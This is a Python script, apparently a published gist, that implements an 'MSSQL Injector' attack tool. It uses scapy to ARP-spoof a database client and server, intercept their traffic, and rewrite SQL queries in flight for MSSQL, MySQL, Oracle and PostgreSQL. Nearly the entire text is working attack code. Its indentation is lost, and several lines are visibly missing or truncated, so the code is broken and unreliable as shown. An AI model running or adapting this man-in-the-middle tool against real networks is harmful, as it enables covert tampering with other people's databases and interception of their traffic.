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Created September 21, 2016 18:43
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from scapy.all import *
import unicodedata
import sys, getopt
import time, datetime
import argparse
import socket
import fcntl
import struct
import threading
# ARP Scan - Get remote MAC address #
def arp_scan(ip):
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = ip), timeout = 2)
for snd,rcv in ans:
return rcv.sprintf(r"%Ether.src%")
return 1
# Used to pad new query with spaces because of TCP checksum. #
def pad_query(old_query, new_query, q_modifier):
padded_query = new_query
length = len(old_query) - (len(new_query) * q_modifier)
for i in range(0, length/q_modifier):
padded_query = padded_query + " " # Add spaces to the end of the SQL query
return padded_query
# Used to pad new query with spaces because of TCP checksum. #
# Also keeps special Oracle characters in place after query. #
def pad_query_oracle(old_query, new_query):
padded_query = new_query
length = len(old_query) - len(new_query) - 52
#print "padding with " + str(length)
#print old_query
#print new_query
for i in range(0, length):
padded_query = padded_query + " " # Add spaces to the end of the SQL query
# This all seems to be required for Oracle for some reason
padded_query = padded_query + "\x01"
for i in range(0, 27):
padded_query = padded_query + "\x00"
padded_query = padded_query + "\x01"
for i in range(0, 8):
padded_query = padded_query + "\x00"
padded_query = padded_query + "\x80"
for i in range(0, 14):
padded_query = padded_query + "\x00"
return padded_query
# Used to pad new query with spaces because of TCP checksum. #
# PostgreSQL keeps the semicolon at the end so we need this. #
def pad_query_postgresql(old_query, new_query):
padded_query = new_query
length = len(old_query) - len(new_query)
for i in range(0, length - 2):
padded_query = padded_query + " " # Add spaces to the end of the SQL query
padded_query = padded_query + ";\x00"
return padded_query
# Used to pad SQL strings with null bytes. #
def encode_query(query):
query2 = ""
for c in query:
query2 = query2 + c + "\x00" # Insert bye \x00 after each character in the string
return query2
# Get my own MAC address. #
def get_mac_address(my_interface):
mac = get_if_hwaddr(my_interface)
if mac != "00:00:00:00:00:00":
return mac
return 1
# Get Interface IP Address #
def get_interface_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
struct.pack('256s', ifname[:15])
def arp_spoof(client_ip, server_ip):
print "Sending ARP spoofing packets..."
print "Client: " + client_ip + " / Server: " + server_ip
# Tell the client that I am the server
packet = ARP()
packet.psrc = server_ip
packet.pdst = client_ip
packet.op = 2
# Tell the server that I am the client
packet = ARP()
packet.psrc = client_ip
packet.pdst = server_ip
packet.op = 2
return 0
# Undo ARP Spoof #
def undo_arp_spoof(client_ip, client_mac, server_ip, server_mac):
rearp_packet = ARP()
rearp_packet.psrc = client_ip
rearp_packet.pdst = server_ip
rearp_packet.hwsrc = client_mac
rearp_packet.hwdst = server_mac
rearp_packet.op = 2 # "is-at" opcode instead of the default "query"
rearp_packet = ARP()
rearp_packet.psrc = server_ip
rearp_packet.pdst = client_ip
rearp_packet.hwsrc = server_mac
rearp_packet.hwdst = client_mac
rearp_packet.op = 2 # "is-at" opcode instead of the default "query"
return 0
# Search for matching MSSQL query #
def search_for_mssql(data, begin_keyword, end_keyword):
if i > 0:
j=str(data).find(end_keyword, i)
if j > 0:
return data[i:j], i, j
return 1,1,1
# Search for matching MYSQL query #
def search_for_mysql(data, begin_keyword):
if i > 0:
return data[i:len(data)], i, len(data)
return 1,1,1
# Check for keyboard interrupt #
def stopfilter(x):
return True
except keyboardInterrupt:
print "Re-ARPing victims..."
undo_arp_spoof(client_ip, client_mac, server_ip, server_mac)
return False
# Process each packet as it's received. #
def processPacket(my_mac, server_type, client_mac, client_ip, server_mac, server_ip, begin_keyword, end_keyword, new_query):
### Must nest a function here to pass arguments from sniff() ###
def manipulatePacket(in_packet):
if in_packet.haslayer(TCP):
out_packet=in_packet #setup the outbound packet.
#print "srcmac: " + srcmac
#print "dstmac: " + dstmac
### Does the packet have Raw data? ###
if in_packet.haslayer(Raw):
match = False
### Does the Raw data contain keywords? ###
### Check MSSQL ###
if server_type == "mssql":
old_query, startQuery, endQuery = search_for_mssql(data, begin_keyword, end_keyword)
if old_query != 1:
match = True
### Check MYSQL ###
elif server_type == "mysql" or server_type == "oracle" or server_type == "postgresql":
old_query, startQuery, endQuery = search_for_mysql(data, begin_keyword)
if old_query != 1:
match = True
### Do we have a match? ###
if match == True:
print "Found a matching packet!"
### Is new Query too long? ###
if server_type == "mssql":
q_modifier = 2 # MSSQL has null bytes between characters so we must double our new query length
elif server_type == "mysql" or server_type == "oracle" or server_type == "postgresql":
q_modifier = 1
if len(old_query) < (len(new_query) * q_modifier):
print "Cannot replace: New query is longer than old query!"
print "OldQuery: " + str(len(old_query)), " | NewQuery: " + str(len(new_query) * q_modifier)
### Update outbound packet with new data ###
if server_type == "mssql":
out_packet.load=out_packet.load[:startQuery] + encode_query(pad_query(old_query,new_query,q_modifier)) + out_packet.load[endQuery:]
elif server_type == "mysql":
out_packet.load=out_packet.load[:startQuery] + pad_query(old_query,new_query,q_modifier) + out_packet.load[endQuery:]
elif server_type == "oracle":
out_packet.load=out_packet.load[:startQuery] + pad_query_oracle(old_query,new_query) + out_packet.load[endQuery:]
elif server_type == "postgresql":
out_packet.load=out_packet.load[:startQuery] + pad_query_postgresql(old_query,new_query) + out_packet.load[endQuery:]
print "Replaced query!"
### Check if packet is from victims. ###
### If so, replace MAC address fields ###
### and send packet. ###
if in_packet[IP].src == client_ip and srcmac == client_mac and dstmac == my_mac: # If source is client
del out_packet[TCP].chksum
out_packet.dst=server_mac # Send to server
if in_packet[IP].src == server_ip and srcmac == server_mac and dstmac == my_mac: # If source is server
print "retransmitting packet to client"
del out_packet[TCP].chksum
out_packet.dst=client_mac # Send to client
return manipulatePacket
# MAIN #
def main(argv):
print ""
print "Anitian RingZero MSSQL Injector"
print "By: Rick Osgood"
print "Press Ctrl+C to quit."
print ""
### Check arguments ###
parser = argparse.ArgumentParser()
parser.add_argument("interface", nargs=1, metavar="<Interface>", help="Interface to sniff on.")
parser.add_argument("server_type", nargs=1, metavar="<SQL Server Type>", help="mssql/mysql/oracle/postgresql.")
parser.add_argument("client_ip", nargs=1, metavar="<Client IP>", help="SQL Client IP.")
parser.add_argument("server_ip", nargs=1, metavar="<Server IP>", help="SQL Server IP.")
parser.add_argument("new_query", nargs=1, metavar="<New Query>", help="New query to inject.")
parser.add_argument("--begin_keyword", nargs=1, metavar="<Begin Keyword>", help="Keyword (case-insensitive) at the beginning of the query to be replaced. Default: \"SELECT\"")
parser.add_argument("--end_keyword", nargs=1, metavar="<End Keyword>", help="Keyword (case-insensitive) at the end of the query to be replaced. Default: \";\"")
args = parser.parse_args()
### Remove the [" and "] from the strings
my_interface = str(args.interface)[2:-2]
server_type = str(args.server_type)[2:-2]
client_ip = str(args.client_ip)[2:-2]
server_ip = str(args.server_ip)[2:-2]
new_query = str(args.new_query)[2:-2]
if args.begin_keyword:
begin_keyword = str(args.begin_keyword)[2:-2].lower() # Make lowercase for case insensitivity
begin_keyword = "select" # Default value
if args.end_keyword:
end_keyword = str(args.end_keyword)[2:-2].lower() # Make lowercase for case insensitivity
end_keyword = ";" # Default value
### Get local MAC address ###
my_mac = get_mac_address(my_interface)
if not my_mac:
print "Can't get local mac address. Quitting."
### Get local IP address ###
my_ip = get_interface_address(my_interface)
if not my_ip:
print "Can't get local IP address. Quitting."
### Get client MAC address ###
if client_mac is None or client_mac == 1:
print "Could not get MSSQL client MAC address!"
### Get server MAC address ###
if server_mac is None or server_mac == 1:
print "Could not get MSSQL server MAC address!"
### Helpful output for debugging
print "Sniffing on " + my_ip + "..."
print ""
### Set the first Arp Spoof to happen after 1 second, from there it will happen every 15 seconds.
arp_spoof(client_ip, server_ip)
arpTimer=threading.Timer(15, arp_spoof, args=[client_ip, server_ip])
### Sniff packets forever ##
filter_string = "host " + client_ip + " or host " + server_ip
while True:
sniff(filter=filter_string, prn=processPacket(my_mac, server_type, client_mac, client_ip, server_mac, server_ip, begin_keyword, end_keyword, new_query))
print "Re-ARPing victims..."
undo_arp_spoof(client_ip, client_mac, server_ip, server_mac)
if __name__ == "__main__":
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